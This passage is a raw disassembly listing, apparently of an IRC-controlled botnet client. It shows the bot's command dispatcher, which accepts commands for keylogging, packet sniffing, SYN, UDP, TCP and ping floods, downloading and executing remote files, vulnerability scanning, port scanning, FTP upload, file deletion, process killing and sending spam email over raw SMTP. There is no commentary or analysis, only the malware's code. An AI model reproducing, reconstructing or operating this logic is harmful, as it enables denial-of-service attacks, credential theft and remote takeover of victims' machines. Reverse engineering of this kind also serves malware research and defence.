pop ecx
jz loc_411787
push [ebp+arg_8]
push offset aEnz_pt ; "enz.pt"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411787
push [ebp+arg_8]
push offset aEnz_raw ; "enz.raw"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411753
push [ebp+arg_8]
push offset aEnz_r ; "enz.r"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411753
push [ebp+arg_8]
push offset aThreads_kill ; "threads.kill"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4116A3
push [ebp+arg_8]
push offset aThreads_k ; "threads.k"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4116A3
push [ebp+arg_8]
push offset aClone_quit ; "clone.quit"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4115F8
push [ebp+arg_8]
push offset aClone_q ; "clone.q"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4115F8
push [ebp+arg_8]
push offset aClone_rndnick ; "clone.rndnick"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4115AD
push [ebp+arg_8]
push offset aClone_rn ; "clone.rn"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4115AD
push [ebp+arg_8]
push offset aEnz_prefix ; "enz.prefix"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411598
push [ebp+arg_8]
push offset aEnz_pr ; "enz.pr"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411598
push [ebp+arg_8]
push offset aBox_open ; "box.open"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41156E
push [ebp+arg_8]
push offset aBox_o ; "box.o"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41156E
push [ebp+arg_8]
push offset aEnz_setserve ; "enz.setserve"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411549
push [ebp+arg_8]
push offset aEnz_se ; "enz.se"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411549
push [ebp+arg_8]
push offset aEnz_dns ; "enz.dns"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4114EA
push [ebp+arg_8]
push offset aEnz_dn ; "enz.dn"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4114EA
push [ebp+arg_8]
push offset aBox_killprocna ; "box.killprocname"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4114BE
push [ebp+arg_8]
push offset aBox_kpn ; "box.kpn"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4114BE
push [ebp+arg_8]
push offset aBox_prockillid ; "box.prockillid"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411463
push [ebp+arg_8]
push offset aBox_pkid ; "box.pkid"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411463
push [ebp+arg_8]
push offset aBox_delete ; "box.delete"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41142C
push [ebp+arg_8]
push offset aBox_del ; "box.del"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41142C
push [ebp+arg_8]
push offset aDcc_get ; "dcc.get"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41134C
push [ebp+arg_8]
push offset aDcc_gt ; "dcc.gt"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41134C
push [ebp+arg_8]
push offset aBox_filelist ; "box.filelist"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411331
push [ebp+arg_8]
push offset aBox_fl ; "box.fl"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411331
push [ebp+arg_8]
push offset aEnz_visit ; "enz.visit"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411245
push [ebp+arg_8]
push offset aEnz_v ; "enz.v"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_411245
push [ebp+arg_8]
push offset aMirc_cmd ; "mirc.cmd"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4111D1
push [ebp+arg_8]
push offset aMirc_cmd ; "mirc.cmd"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4111D1
push [ebp+arg_8]
push offset aBox_cmd ; "box.cmd"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41117D
push [ebp+arg_8]
push offset aBox_cm ; "box.cm"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41117D
push [ebp+arg_8]
push offset aBox_readfile ; "box.readfile"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4110F8
push [ebp+arg_8]
push offset aBox_rf ; "box.rf"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4110F8
push [ebp+arg_8]
push offset aSniff ; "sniff"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_40E9A2
push edi
push offset aOn ; "on"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_40E96A
push 18h
call sub_41501C
test eax, eax
pop ecx
jle short loc_40E898
push offset unk_43606C
jmp loc_40F8E8
; ---------------------------------------------------------------------------
loc_40E898: ; CODE XREF: sub_40CD3A+1B52�j
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_8C]
mov [ebp+var_36C], eax
mov eax, [ebp+var_4]
mov [ebp+var_2E4], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+var_2E0], eax
jnz short loc_40E8DA
mov esi, offset dword_42C310
push offset byte_43B658
push esi
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40E8DA
mov esi, [ebp+var_8C]
loc_40E8DA: ; CODE XREF: sub_40CD3A+1B82�j
; sub_40CD3A+1B98�j
push esi
lea eax, [ebp+var_368]
push 80h
push eax
call sub_41588A
lea eax, [ebp+var_2D8]
push offset unk_436028
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push 18h
push eax
call sub_414DDA
add esp, 20h
mov [ebp+var_2E8], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_36C]
push ebx
push eax
push offset sub_4024D0
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_2E8]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_40E95D
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset unk_435FD8
jmp loc_40EAFE
; ---------------------------------------------------------------------------
loc_40E955: ; CODE XREF: sub_40CD3A+1C29�j
push 32h
call dword_421060 ; Sleep
loc_40E95D: ; CODE XREF: sub_40CD3A+1C08�j
cmp [ebp+var_2DC], ebx
jz short loc_40E955
jmp loc_40F8F6
; ---------------------------------------------------------------------------
loc_40E96A: ; CODE XREF: sub_40CD3A+1B42�j
push edi
push offset aOff ; "off"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_40F8F6
push ebx
push 18h
call sub_414FCF
pop ecx
cmp eax, ebx
pop ecx
jle short loc_40E998
push eax
push offset unk_435F88
jmp loc_40EAFE
; ---------------------------------------------------------------------------
loc_40E998: ; CODE XREF: sub_40CD3A+1C51�j
push offset unk_435F4C
jmp loc_40F8E8
; ---------------------------------------------------------------------------
loc_40E9A2: ; CODE XREF: sub_40CD3A+1B2D�j
push [ebp+arg_8]
push offset aBox_keylog ; "box.keylog"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_40EB27
push edi
push offset aOn ; "on"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_40EA13
push edi
push offset aFile ; "file"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_40EA13
push edi
push offset aOff ; "off"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_40F8F6
push ebx
push 1Ah
call sub_414FCF
pop ecx
cmp eax, ebx
pop ecx
jle short loc_40EA09
push eax
push offset unk_435EF0
jmp loc_40EAFE
; ---------------------------------------------------------------------------
loc_40EA09: ; CODE XREF: sub_40CD3A+1CC2�j
push offset unk_435EB0
jmp loc_40F8E8
; ---------------------------------------------------------------------------
loc_40EA13: ; CODE XREF: sub_40CD3A+1C8E�j
; sub_40CD3A+1C9F�j
push 1Ah
call sub_41501C
test eax, eax
pop ecx
jle short loc_40EA29
push offset unk_435E7C
jmp loc_40F8E8
; ---------------------------------------------------------------------------
loc_40EA29: ; CODE XREF: sub_40CD3A+1CE3�j
mov eax, [ebp+arg_4]
push edi
mov [ebp+var_36C], eax
mov eax, [ebp+var_4]
push offset aFile ; "file"
mov [ebp+var_2E4], eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40EA58
mov [ebp+var_2E0], 1
jmp short loc_40EA61
; ---------------------------------------------------------------------------
loc_40EA58: ; CODE XREF: sub_40CD3A+1D10�j
mov eax, [ebp+var_8]
mov [ebp+var_2E0], eax
loc_40EA61: ; CODE XREF: sub_40CD3A+1D1C�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jnz short loc_40EA88
mov esi, offset dword_42C308
push offset byte_43B658
push esi
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40EA88
mov esi, [ebp+var_8C]
loc_40EA88: ; CODE XREF: sub_40CD3A+1D30�j
; sub_40CD3A+1D46�j
push esi
lea eax, [ebp+var_364]
push 80h
push eax
call sub_41588A
lea eax, [ebp+var_2D8]
push offset unk_435E48
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push 1Ah
push eax
call sub_414DDA
add esp, 20h
mov [ebp+var_368], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_36C]
push ebx
push eax
push offset sub_4021FB
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_368]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_40EB1A
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset unk_435DF8
loc_40EAFE: ; CODE XREF: sub_40CD3A+1C16�j
; sub_40CD3A+1C59�j ...
lea eax, [ebp+var_2D8]
push eax
call sub_415316
loc_40EB0A: ; CODE XREF: sub_40CD3A+5A12�j
add esp, 0Ch
jmp loc_40F8F6
; ---------------------------------------------------------------------------
loc_40EB12: ; CODE XREF: sub_40CD3A+1DE6�j
push 32h
call dword_421060 ; Sleep
loc_40EB1A: ; CODE XREF: sub_40CD3A+1DB6�j
cmp [ebp+var_2DC], ebx
jz short loc_40EB12
jmp loc_40F8F6
; ---------------------------------------------------------------------------
loc_40EB27: ; CODE XREF: sub_40CD3A+1C79�j
push [ebp+arg_8]
push offset aBox_net ; "box.net"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_40EDD1
cmp dword_43CAF0, ebx
jz short loc_40EB58
cmp dword_43CB18, ebx
jz short loc_40EB58
push offset dword_435DA0
jmp loc_40EDBE
; ---------------------------------------------------------------------------
loc_40EB58: ; CODE XREF: sub_40CD3A+1E0A�j
; sub_40CD3A+1E12�j
cmp [ebp+var_C], ebx
jz loc_40F526
mov eax, [ebp+esi+var_8C]
mov [ebp+arg_0], ebx
cmp eax, ebx
mov [ebp+arg_18], eax
jz short loc_40EB80
push eax
push [ebp+var_C]
call sub_4158E0
pop ecx
mov [ebp+arg_0], eax
pop ecx
loc_40EB80: ; CODE XREF: sub_40CD3A+1E36�j
push edi
push offset aStart ; "start"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40EBEC
cmp [ebp+arg_18], ebx
jz short loc_40EBBA
push [ebp+arg_0]
push 3
loc_40EB9B: ; CODE XREF: sub_40CD3A+1EC8�j
; sub_40CD3A+1EE0�j ...
call sub_412C6C
push eax
lea eax, [ebp+var_2D8]
push offset aS_1 ; "%s"
push eax
call sub_415316
add esp, 14h
jmp loc_40F526
; ---------------------------------------------------------------------------
loc_40EBBA: ; CODE XREF: sub_40CD3A+1E5A�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412F13
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_2D8]
jz short loc_40EBE2
push offset dword_435D64
jmp loc_40EDC4
; ---------------------------------------------------------------------------
loc_40EBE2: ; CODE XREF: sub_40CD3A+1E9C�j
push offset dword_435D30
jmp loc_40EDC4
; ---------------------------------------------------------------------------
loc_40EBEC: ; CODE XREF: sub_40CD3A+1E55�j
push edi
push offset aStop ; "stop"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40EC04
push [ebp+arg_0]
push 4
jmp short loc_40EB9B
; ---------------------------------------------------------------------------
loc_40EC04: ; CODE XREF: sub_40CD3A+1EC1�j
push edi
push offset aPause ; "pause"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40EC1F
push [ebp+arg_0]
push 5
jmp loc_40EB9B
; ---------------------------------------------------------------------------
loc_40EC1F: ; CODE XREF: sub_40CD3A+1ED9�j
push edi
push offset aContinue ; "continue"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40EC3A
push [ebp+arg_0]
push 6
jmp loc_40EB9B
; ---------------------------------------------------------------------------
loc_40EC3A: ; CODE XREF: sub_40CD3A+1EF4�j
push edi
push offset aDelete ; "delete"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40EC55
push [ebp+arg_0]
push 1
jmp loc_40EB9B
; ---------------------------------------------------------------------------
loc_40EC55: ; CODE XREF: sub_40CD3A+1F0F�j
push edi
push offset aShare ; "share"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40ECD8
cmp [ebp+arg_18], ebx
jz short loc_40ECA5
cmp [ebp+var_8FC], bl
jz short loc_40EC7B
push ebx
push [ebp+arg_18]
push 1
jmp short loc_40EC86
; ---------------------------------------------------------------------------
loc_40EC7B: ; CODE XREF: sub_40CD3A+1F37�j
push [ebp+esi+var_88]
push [ebp+arg_18]
push ebx
loc_40EC86: ; CODE XREF: sub_40CD3A+1F3F�j
call sub_413053
push eax
lea eax, [ebp+var_2D8]
push offset aS_1 ; "%s"
push eax
call sub_415316
add esp, 18h
jmp loc_40F526
; ---------------------------------------------------------------------------
loc_40ECA5: ; CODE XREF: sub_40CD3A+1F2F�j
push ebx
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_413248
add esp, 10h
test eax, eax
lea eax, [ebp+var_2D8]
jz short loc_40ECCE
push offset dword_435CDC
jmp loc_40EDC4
; ---------------------------------------------------------------------------
loc_40ECCE: ; CODE XREF: sub_40CD3A+1F88�j
push offset dword_435CA8
jmp loc_40EDC4
; ---------------------------------------------------------------------------
loc_40ECD8: ; CODE XREF: sub_40CD3A+1F2A�j
push edi
push offset aUser ; "user"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_40ED6E
mov eax, [ebp+arg_18]
cmp eax, ebx
jz short loc_40ED41
push [ebp+var_4]
cmp [ebp+var_8FC], bl
push [ebp+var_8C]
push [ebp+arg_4]
jz short loc_40ED0E
push ebx
push eax
push 1
jmp short loc_40ED22
; ---------------------------------------------------------------------------
loc_40ED0E: ; CODE XREF: sub_40CD3A+1FCC�j
mov esi, [ebp+esi+var_88]
cmp esi, ebx
jz short loc_40ED1E
push esi
push eax
push ebx
jmp short loc_40ED22
; ---------------------------------------------------------------------------
loc_40ED1E: ; CODE XREF: sub_40CD3A+1FDD�j
push ebx
push eax
push 2
loc_40ED22: ; CODE XREF: sub_40CD3A+1FD2�j
; sub_40CD3A+1FE2�j
call sub_413369
push eax
lea eax, [ebp+var_2D8]
push offset aS_1 ; "%s"
push eax
call sub_415316
add esp, 24h
jmp loc_40F526
; ---------------------------------------------------------------------------
loc_40ED41: ; CODE XREF: sub_40CD3A+1FB8�j
push ebx
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_41387D
add esp, 10h
test eax, eax
lea eax, [ebp+var_2D8]
jz short loc_40ED67
push offset dword_435C6C
jmp short loc_40EDC4
; ---------------------------------------------------------------------------
loc_40ED67: ; CODE XREF: sub_40CD3A+2024�j
push offset dword_435C3C
jmp short loc_40EDC4
; ---------------------------------------------------------------------------
loc_40ED6E: ; CODE XREF: sub_40CD3A+1FAD�j
push edi
push offset aSend ; "send"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40EDB9
cmp [ebp+arg_18], ebx
jz short loc_40EDB2
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_413B27
push eax
lea eax, [ebp+var_2D8]
push offset aS_1 ; "%s"
push eax
call sub_415316
add esp, 1Ch
jmp loc_40F526
; ---------------------------------------------------------------------------
loc_40EDB2: ; CODE XREF: sub_40CD3A+2048�j
push offset dword_435C08
jmp short loc_40EDBE
; ---------------------------------------------------------------------------
loc_40EDB9: ; CODE XREF: sub_40CD3A+2043�j
push offset dword_435BD8
loc_40EDBE: ; CODE XREF: sub_40CD3A+1E19�j
; sub_40CD3A+207D�j ...
lea eax, [ebp+var_2D8]
loc_40EDC4: ; CODE XREF: sub_40CD3A+1EA3�j
; sub_40CD3A+1EAD�j ...
push eax
call sub_415316
pop ecx
pop ecx
jmp loc_40F526
; ---------------------------------------------------------------------------
loc_40EDD1: ; CODE XREF: sub_40CD3A+1DFE�j
push [ebp+arg_8]
push offset aEnz_gethost ; "enz.gethost"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41101A
push [ebp+arg_8]
push offset aEnz_gh ; "enz.gh"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41101A
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
mov [ebp+arg_18], eax
jz loc_40D18F
push [ebp+arg_8]
push offset aEnz_addalias ; "enz.addalias"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410FDB
push [ebp+arg_8]
push offset aEnz_aa ; "enz.aa"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410FDB
push [ebp+arg_8]
push offset aEnz_privmsg ; "enz.privmsg"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410F85
push [ebp+arg_8]
push offset aEnz_pm ; "enz.pm"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410F85
push [ebp+arg_8]
push offset aEnz_action ; "enz.action"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410F17
push [ebp+arg_8]
push offset aEnz_ac ; "enz.ac"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410F17
push [ebp+arg_8]
push offset aEnz_cycle ; "enz.cycle"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410EB1
push [ebp+arg_8]
push offset aEnz_cy ; "enz.cy"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410EB1
push [ebp+arg_8]
push offset aEnz_mode ; "enz.mode"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410E7A
push [ebp+arg_8]
push offset aEnz_m ; "enz.m"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410E7A
push [ebp+arg_8]
push offset aClone_raw ; "clone.raw"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410E0F
push [ebp+arg_8]
push offset aClone_ra ; "clone.ra"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410E0F
push [ebp+arg_8]
push offset aClone_mode ; "clone.mode"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410D8D
push [ebp+arg_8]
push offset aClone_m ; "clone.m"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410D8D
push [ebp+arg_8]
push offset aClone_nick ; "clone.nick"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410D1F
push [ebp+arg_8]
push offset aClone_ni ; "clone.ni"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410D1F
push [ebp+arg_8]
push offset aClone_join ; "clone.join"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410CF9
push [ebp+arg_8]
push offset aClone_j ; "clone.j"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410CF9
push [ebp+arg_8]
push offset aClone_part ; "clone.part"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410C99
push [ebp+arg_8]
push offset aClone_p ; "clone.p"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410C99
push [ebp+arg_8]
push offset aEnz_repeat ; "enz.repeat"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410BCA
push [ebp+arg_8]
push offset aEnz_rp ; "enz.rp"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410BCA
push [ebp+arg_8]
push offset aEnz_delay ; "enz.delay"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410B2F
push [ebp+arg_8]
push offset aEnz_de ; "enz.de"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410B2F
push [ebp+arg_8]
push offset aDownload_updiz ; "download.updiz"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4109B2
push [ebp+arg_8]
push offset aDownload_upz ; "download.upz"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4109B2
push [ebp+arg_8]
push offset aBox_execute ; "box.execute"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410919
push [ebp+arg_8]
push offset aBox_e ; "box.e"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410919
push [ebp+arg_8]
push offset aBox_findfile ; "box.findfile"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41080D
push [ebp+arg_8]
push offset aBox_ff ; "box.ff"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41080D
push [ebp+arg_8]
push offset aBox_rename ; "box.rename"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4107BC
push [ebp+arg_8]
push offset aBox_mv ; "box.mv"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4107BC
push [ebp+arg_8]
push offset aDdos_icmp ; "ddos.icmp"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4106C2
push [ebp+arg_8]
push offset aDdos_ic ; "ddos.ic"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4106C2
mov eax, [ebp+esi+var_88]
cmp eax, ebx
mov [ebp+arg_0], eax
jz loc_40D18F
push [ebp+arg_8]
push offset aClone_make ; "clone.make"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4105D8
push [ebp+arg_8]
push offset aClone_start ; "clone.start"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4105D8
push [ebp+arg_8]
push offset aDs_sy1 ; "ds.sy1"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4104C7
push [ebp+arg_8]
push offset aDs_ack ; "ds.ack"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4104C7
push [ebp+arg_8]
push offset aDs_rm ; "ds.rm"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4104C7
push [ebp+arg_8]
push offset aDdos_synflood ; "ddos.synflood"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4103C9
push [ebp+arg_8]
push offset aSy1 ; "sy1"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4103C9
push [ebp+arg_8]
push offset aDownload_fromw ; "download.fromwww"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41028C
push [ebp+arg_8]
push offset aD1 ; "d1"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41028C
push [ebp+arg_8]
push offset aServer_redir_0 ; "server.redirect.on"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410193
push [ebp+arg_8]
push offset aServer_rd_on ; "server.rd.on"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410193
push [ebp+arg_8]
push offset aEnz_portscan ; "enz.portscan"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4100A1
push [ebp+arg_8]
push offset aEnz_ps ; "enz.ps"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4100A1
push [ebp+arg_8]
push offset aClone_privmsg ; "clone.privmsg"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40FFCC
push [ebp+arg_8]
push offset aClone_pm ; "clone.pm"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40FFCC
push [ebp+arg_8]
push offset aClone_action ; "clone.action"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40FEBA
push [ebp+arg_8]
push offset aClone_ac ; "clone.ac"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40FEBA
mov eax, [ebp+esi+var_84]
cmp eax, ebx
mov [ebp+arg_10], eax
jz loc_40D18F
push [ebp+arg_8]
push offset aVuln_start ; "vuln.start"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40FB65
push [ebp+arg_8]
push offset aVvv ; "vvv"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40FB65
push [ebp+arg_8]
push offset aDdos_udpflood ; "ddos.udpflood"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40FA46
push [ebp+arg_8]
push offset aDdos_udpf ; "ddos.udpf"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40FA46
push [ebp+arg_8]
push offset aPu ; "pu"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40FA46
push [ebp+arg_8]
push offset aDdos_pingflood ; "ddos.pingflood"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40F920
push [ebp+arg_8]
push offset aDdos_pingf ; "ddos.pingf"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40F920
push [ebp+arg_8]
push offset aPg ; "pg"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40F920
push [ebp+arg_8]
push offset aDdos_tcpflood ; "ddos.tcpflood"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40F75E
push [ebp+arg_8]
push offset aUsa ; "usa"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40F75E
push [ebp+arg_8]
push offset aUtil_email ; "util.email"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_40F55E
lea eax, [ebp+var_A7C]
push edi
push eax
call sub_415A20
push [ebp+arg_18]
call sub_41587F
push [ebp+arg_0]
mov [ebp+arg_18], eax
lea eax, [ebp+var_1FD4]
push eax
call sub_415A20
push [ebp+arg_10]
lea eax, [ebp+var_1690]
push eax
call sub_415A20
push offset asc_426A34 ; " "
push offset a_ ; "_"
push [ebp+esi+var_80]
call sub_4098D4
push eax
lea eax, [ebp+var_1ED4]
push eax
call sub_415A20
add esp, 30h
lea eax, [ebp+var_1824]
push eax
push 101h
call dword_43C99C ; WSAStartup
lea eax, [ebp+var_A7C]
push eax
call dword_43CAA8 ; gethostbyname
push 6
push 1
push 2
mov edi, eax
call dword_43CAA4 ; socket
push [ebp+arg_18]
mov esi, eax
mov [ebp+var_D0], 2
mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_CC], eax
call dword_43CA24 ; ntohs
mov [ebp+var_CE], ax
lea eax, [ebp+var_1ED4]
push eax
lea eax, [ebp+var_1FD4]
push eax
lea eax, [ebp+var_1ED4]
push eax
lea eax, [ebp+var_1690]
push eax
lea eax, [ebp+var_1FD4]
push eax
lea eax, [ebp+var_27D4]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax
call sub_415316
add esp, 1Ch
lea eax, [ebp+var_D0]
push 10h
push eax
push esi
call dword_43C9CC ; connect
mov edi, 100h
push ebx
lea eax, [ebp+var_1DD0]
push edi
push eax
push esi
call dword_43CA3C ; recv
lea eax, [ebp+var_1DD0]
push ebx
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_27D4]
push eax
push esi
call dword_43CA74 ; send
push ebx
lea eax, [ebp+var_1DD0]
push edi
push eax
push esi
call dword_43CA3C ; recv
push esi
call dword_43CABC ; closesocket
call dword_43C984 ; WSACleanup
lea eax, [ebp+var_1690]
push eax
push offset unk_435880
loc_40F517: ; CODE XREF: sub_40CD3A+396E�j
; sub_40CD3A+3DD1�j ...
lea eax, [ebp+var_2D8]
loc_40F51D: ; CODE XREF: sub_40CD3A+3C73�j
push eax
call sub_415316
loc_40F523: ; CODE XREF: sub_40CD3A+50FE�j
add esp, 0Ch
loc_40F526: ; CODE XREF: sub_40CD3A+1E21�j
; sub_40CD3A+1E7B�j ...
cmp [ebp+var_8], ebx
jnz short loc_40F547
push ebx
lea eax, [ebp+var_2D8]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
add esp, 14h
loc_40F547: ; CODE XREF: sub_40CD3A+27EF�j
; sub_40CD3A+4433�j ...
mov esi, [ebp+arg_24]
loc_40F54A: ; CODE XREF: sub_40CD3A+954�j
; sub_40CD3A+475D�j ...
lea eax, [ebp+var_2D8]
push eax
call sub_40B078
pop ecx
mov eax, esi
jmp loc_40D192
; ---------------------------------------------------------------------------
loc_40F55E: ; CODE XREF: sub_40CD3A+2687�j
push [ebp+arg_8]
push offset aUtil_httpcon ; "util.httpcon"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40F730
push [ebp+arg_8]
push offset aUtil_hcon ; "util.hcon"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40F730
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz loc_40D18F
push [ebp+arg_8]
push offset aFtp_upload ; "ftp.upload"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz loc_412818
push 4
push esi
call sub_40C0F3
pop ecx
test eax, eax
pop ecx
jnz short loc_40F604
push esi
push offset dword_435824
loc_40F5C3: ; CODE XREF: sub_40CD3A+4989�j
lea eax, [ebp+var_2D8]
push eax
call sub_415316
add esp, 0Ch
loc_40F5D2: ; CODE XREF: sub_40CD3A+42DB�j
; sub_40CD3A+518D�j
cmp [ebp+var_8], ebx
jnz short loc_40F5F3
push ebx
